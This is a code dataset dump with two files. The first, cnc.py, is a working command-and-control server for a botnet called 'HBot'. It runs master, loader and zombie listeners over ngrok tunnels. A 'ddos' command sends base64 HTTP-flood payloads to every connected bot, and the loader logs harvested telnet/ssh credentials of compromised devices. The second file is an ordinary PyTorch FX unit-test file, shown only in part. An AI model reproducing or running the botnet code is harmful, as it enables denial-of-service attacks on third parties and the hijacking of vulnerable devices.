source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
cnc.py
|
from lib import network, database, console, tools
import threading, socket, random, time
from pyngrok import ngrok
class Master(threading.Thread):
def __init__(self, console: console.Console, color: console.Color, database: database.Database, socket_session: socket.socket, ip: str, port: int):
threading.Thread.__init__(self)
self.network = network.Network(socket_session, database)
self.database = database
self.console = console
self.color = color
self.port = port
self.ok = True
self.ip = ip
# Temp session storage
self.session_time = int(time.time())
self.login_attemp = 0
self.kicked_time = 0
self.username = None
self.password = None
self.logged = False
self.grade = None
def kill(self, reason: str, send: bool= False):
if self.ok:
if send:
self.send(reason)
if self in self.database.online_user:
self.database.online_user.remove(self)
self.console.print_info(f'{self.ip} -> master killed -> {reason}')
self.network.close_socket()
self.ok = False
def send(self, content: str):
if not self.network.send_packet(content):
self.kill('Error when send packet')
def bulk_send(self, packets: list):
if not self.network.bulk_send_packet(packets):
self.kill('Error when send packets list')
def recv(self, content: str= False):
if content:
self.send(content)
data = self.network.recv_packet()
if not data:
self.kill(f'Invalid data recieved')
return None
else:
return data
# Custom function
def set_title(self, title: str):
self.send(f'\033]0;HBot | {title}\007')
def clear_screen(self):
self.bulk_send([
'\033[2J\033[1H',
'',
f' {self.color.fade("╦.╦╔╗.╔═╗╔╦╗")}'.replace('.', f'{self.color.white}.'),
f' {self.color.fade("╠═╣╠╩╗║.║.║.")}'.replace('.', f'{self.color.white}.'),
f' {self.color.fade("╩.╩╚═╝╚═╝.╩.")}{self.color.reset}'.replace('.', f'{self.color.white}.'),
'\r'
])
def loop_thread(self):
while self.ok:
time.sleep(1)
if self.logged:
bd = self.database.get_network_bandwitch()
send_bd = bd.split('|')[0]
recv_bd = bd.split('|')[1]
self.set_title(f'User: {len(self.database.online_user)} | Bots: {len(self.database.online_zombie)} | Vuln: {self.database.total_ssh_bots + self.database.total_telnet_bots} | Loader: {len(self.database.online_loader)} | Command: {self.database.send_command} | Task: {self.database.send_task} | Packet: {send_bd} / {recv_bd}')
else:
self.kicked_time = int(time.time()) - self.session_time
self.set_title(f'Login page | Attemp: {self.login_attemp}/3 | Kicked on: {self.kicked_time}/30s')
if self.kicked_time >= 30:
self.kill('You did not connect in time !', True)
def login(self):
self.clear_screen()
while self.ok:
if self.login_attemp == 3:
self.kill('Max login attemp', True)
else:
self.login_attemp += 1
self.username = self.recv(f'{self.color.red}>{self.color.reset} Username{self.color.reset}: ')
self.password = self.recv(f'{self.color.red}>{self.color.reset} Password{self.color.reset}: ')
if self.database.user_valid(self.username, self.password):
self.grade = self.database.get_user(self.username)['grade']
self.logged = True
break
return self.logged
def prompt(self):
while self.ok:
cmd = self.recv(self.color.fade(f'\r{self.username}@HBot ~$ ').replace('@', f'{self.color.white}@') + self.color.white)
if not cmd:
return
self.database.send_command += 1
argument = cmd.split(' ')
command = argument[0]
# TODO: Show only avaiable commands and clean shit code
if command == 'help': # ・> | Rip eyes
table = self.console.raw_fade(self.console.get_custom_table(['📌 COMMAND', '📋 DESCRIPTION', '⭐ PERMISSION'], [
'clear\nmethod\nlist\ncreate_acc\ndelete_acc\nkill\nstats\nexit',
'Clean the screen\nSee attack methods\nSee connected users\nCreate an account\nDelete an account\nKick user from server\nShow cool stuff\nClose session',
'all\nall\nadmin\nroot\nroot\nroot\nall\nall'
]))
self.bulk_send(table)
elif command == 'exit':
self.kill('Goobye <3', True)
elif command == 'stats':
bd = self.database.get_network_bandwitch()
send_bd = bd.split('|')[0]
recv_bd = bd.split('|')[1]
self.bulk_send(self.console.bulk_fade([
f'\n> Account informations:',
f' - Username: {self.username}',
f' - Grade: {self.grade}',
f'\n> Connected device:',
f' - Loader: {len(self.database.online_loader)}',
f' - Zombie: {len(self.database.online_zombie)}/{self.database.total_telnet_bots + self.database.total_ssh_bots}',
f' - User: {len(self.database.online_user)}',
f'\n> Trafic:',
f' - Total recieved packet: {self.database.recv_packet} ({recv_bd})',
f' - Total sent packet: {self.database.send_packet} ({send_bd})',
f' - Command send: {self.database.send_command}',
f' - Task send: {self.database.send_task}\n'
]))
elif command == 'clear':
self.clear_screen()
elif command == 'method':
table = self.console.raw_fade(self.console.get_simple_table('METHOD', '💥', ['http']))
self.bulk_send(table)
elif command == 'ddos':
if len(argument) < 4:
self.send('Bad syntax: ddos <method> <ip> <port> <time>\n')
else:
ip = argument[2]
port = argument[3]
timeout = argument[4]
method = argument[1]
for zombie in self.database.online_zombie:
zombie.ddos_payload(ip, port, timeout, method)
# Admin command
elif self.grade not in ['root', 'admin']:
self.send(f'You are not allowed to use an {self.color.yellow}Admin{self.color.reset} command !\n')
elif command == 'list':
data = []
for user in self.database.online_user:
data.append(f'User n°{self.color.magenta}{len(data) + 1}{self.color.reset} - Username: {self.color.yellow}{user.username}{self.color.reset} Grade: {self.color.green}{user.grade}{self.color.reset} Session-Time: {self.color.blue_m}{int(time.time()) - user.session_time}{self.color.reset}s')
self.bulk_send(data)
# Root command
elif self.grade not in ['root']:
self.send(f'You are not allowed to use an {self.color.yellow}Root{self.color.reset} command !\n')
# create_acc <user> <pass> <grade>
elif command == 'create_acc':
if len(argument) < 4:
self.send(f'Bad syntax: create_acc <{self.color.orange}username{self.color.reset}> <{self.color.red}password{self.color.reset}> <{self.color.yellow}grade{self.color.reset}>\n')
else:
if self.database.create_user(argument[1], argument[2], argument[3]):
self.send(f'The user has been successfully created\n')
elif command == 'delete_acc':
if len(argument) < 2:
self.send(f'Bad syntax: delete_acc <{self.color.orange}username{self.color.reset}>\n')
else:
result = self.database.delete_user(argument[1])
disconnected= 0
if result:
for user in self.database.online_user:
if user.username == argument[1]:
disconnected += 1
user.kill(f'Account was deleted by {self.username}', True)
self.send(f'The account has been successfully deleted, {disconnected} users have been kicked\n')
else:
self.send(f'Invalid account\n')
elif command == 'kill':
if len(argument) < 2:
self.send(f'Bad syntax: kill <{self.color.orange}username username1 username2{self.color.reset}>\n')
else:
disconnected= 0
for user in self.database.online_user:
if user.username in argument:
disconnected += 1
user.kill(f'Kicked by {self.username}', True)
self.send(f'{disconnected} users was successfully kicked\n')
def run(self):
threading.Thread(target= self.loop_thread).start()
if self.login():
self.database.online_user.append(self)
self.clear_screen()
self.bulk_send([
self.color.fade(f' ╔═══════════════════════════════════~'),
self.color.fade(' ║ ') + f'{self.color.reset}Welcome {self.color.underline}{self.color.white}{self.username}{self.color.reset}, Grade: {self.color.green}{self.grade}{self.color.reset}.',
self.color.fade(' ║ ') + f'{self.color.reset}Type "{self.color.magenta}help{self.color.reset}" to see commands and "{self.color.magenta}exit{self.color.reset}" to disconnect.',
self.color.fade(f' ╚═════════════════════════════════════════════════════~\n'),
])
self.prompt()
class Loader(threading.Thread):
def __init__(self, console: console.Console, database: database.Database, socket_session: socket.socket, ip: str, port: int, http_port: int):
threading.Thread.__init__(self)
self.network = network.Network(socket_session, database)
self.http_port = http_port
self.database = database
self.console = console
self.port = port
self.ok = True
self.ip = ip
# Temp session storage
self.session_time = int(time.time())
def kill(self, reason: str, send: bool= False):
if self.ok:
if send:
self.send(reason)
if self in self.database.online_loader:
self.database.online_loader.remove(self)
self.console.print_info(f'{self.ip} -> loader killed -> {reason}')
self.network.close_socket()
self.ok = False
def send(self, content: str):
if not self.network.send_packet(content):
self.kill('Error when send packet')
def recv(self, content: str= False):
if content:
self.send(content)
data = self.network.recv_packet()
if not data:
self.kill('Invalid data recieved')
return None
else:
return data
def loop_thread(self):
while self.ok:
time.sleep(60)
self.send('ping')
def run(self):
network.FileServer(self.http_port).start()
threading.Thread(target= self.loop_thread).start()
self.database.online_loader.append(self)
while self.ok:
data = self.recv(False)
if data == None:
return
if '|' in data:
argument = data.split('|')
req_type = argument[0]
# scan|127.0.0.1|23|user|pass|telnet
if req_type == 'scan':
ip = argument[1]
port = argument[2]
username = argument[3]
password = argument[4]
device_type = argument[5]
# Due to bug :c,
if device_type == 'telnetscan':
device_type = 'telnet'
count = self.database.create_bot(username, password, ip, port, device_type)
if device_type == 'telnet':
self.database.total_telnet_bots = count
else:
self.database.total_ssh_bots = count
self.console.print_success(f'{self.ip} -> New {device_type} bot "{username}:{password} {ip}:{port}" -> {count} bots')
class Zombie(threading.Thread):
def __init__(self, console: console.Console, database: database.Database, socket_session: socket.socket, ip: str, port: int):
threading.Thread.__init__(self)
self.network = network.Network(socket_session, database)
self.database = database
self.console = console
self.port = port
self.ok = True
self.ip = ip
# Temp session storage
self.session_time = int(time.time())
def kill(self, reason: str, send: bool= False):
if self.ok:
if send:
self.send(reason)
if self in self.database.online_zombie:
self.database.online_zombie.remove(self)
self.console.print_info(f'{self.ip} -> zombie killed -> {reason}')
self.network.close_socket()
self.ok = False
def send(self, content: str):
if not self.network.send_packet(content):
self.kill('Error when send packet')
def recv(self, content: str= False):
if content:
self.send(content)
data = self.network.recv_packet()
if not data:
self.kill('Invalid data recieved')
return None
else:
return data
def loop_thread(self):
while self.ok:
time.sleep(60)
self.send('ping')
def ddos_payload(self, ip: str, port: str, timeout: str, type: str):
if type == 'http':
payload = tools.Encoder().base_64(str(open('./payload/http_flood.py', 'r+').read().replace('!ip!', ip).replace('!port!', port).replace('!time!', timeout)).encode())
elif type == 'test':
payload = tools.Encoder().base_64(str(open('./payload/test_flood.py', 'r+').read().replace('!ip!', ip).replace('!port!', port).replace('!time!', timeout)).encode())
self.send(f'run|{payload}')
def run(self):
threading.Thread(target= self.loop_thread).start()
self.database.online_zombie.append(self)
# Rip this part, anyone optimize ?
class Handler(threading.Thread):
def __init__(self, database: database.Database, console: console.Console, color: console.Color):
threading.Thread.__init__(self)
self.database = database
self.console = console
self.color = color
def master_thread(self, port: int, url: str):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
self.console.print_success(f'Master -> online -> port: {port} -> url {url}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
Master(self.console, self.color, self.database, socket_session, ip, port).start()
def loader_thread(self, port: int, url: str, http_port: int, http_url: str):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
self.console.print_success(f'Loader -> online -> port: {port} -> url {url}')
self.console.print_success(f'File Server -> online -> port: {http_port} -> url {http_url}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
Loader(self.console, self.database, socket_session, ip, port, http_port).start()
def zombie_thread(self, port: int, url: str):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
self.console.print_success(f'Zombie -> online -> port: {port} -> url {url}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
Zombie(self.console, self.database, socket_session, ip, port).start()
def run(self):
# Rip shit code btw
mp = random.randint(1500, 30000)
lp = random.randint(30001, 55000)
zp = random.randint(55001, 60000)
hp = random.randint(60001, 65000)
ml = (ngrok.connect(mp, 'tcp').public_url).split('://')[1]
ll = (ngrok.connect(lp, 'tcp').public_url).split('://')[1]
zl = (ngrok.connect(zp, 'tcp').public_url).split('://')[1]
hl = (ngrok.connect(hp, 'tcp').public_url).split('://')[1]
threading.Thread(target= self.master_thread, args= (mp, ml,)).start()
threading.Thread(target= self.loader_thread, args= (lp, ll, hp, hl)).start()
threading.Thread(target= self.zombie_thread, args= (zp, zl,)).start()
if __name__ == '__main__':
Database = database.Database('mongodb+srv://....')
Console = console.Console()
Color = console.Color()
Console.cnc_banner()
Handler(Database, Console, Color).start()
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from pathlib import Path
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from torch.fx.proxy import TraceError
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
return
torch_root = Path(__file__).resolve().parent.parent
p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
torch.ops.load_library(str(p))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
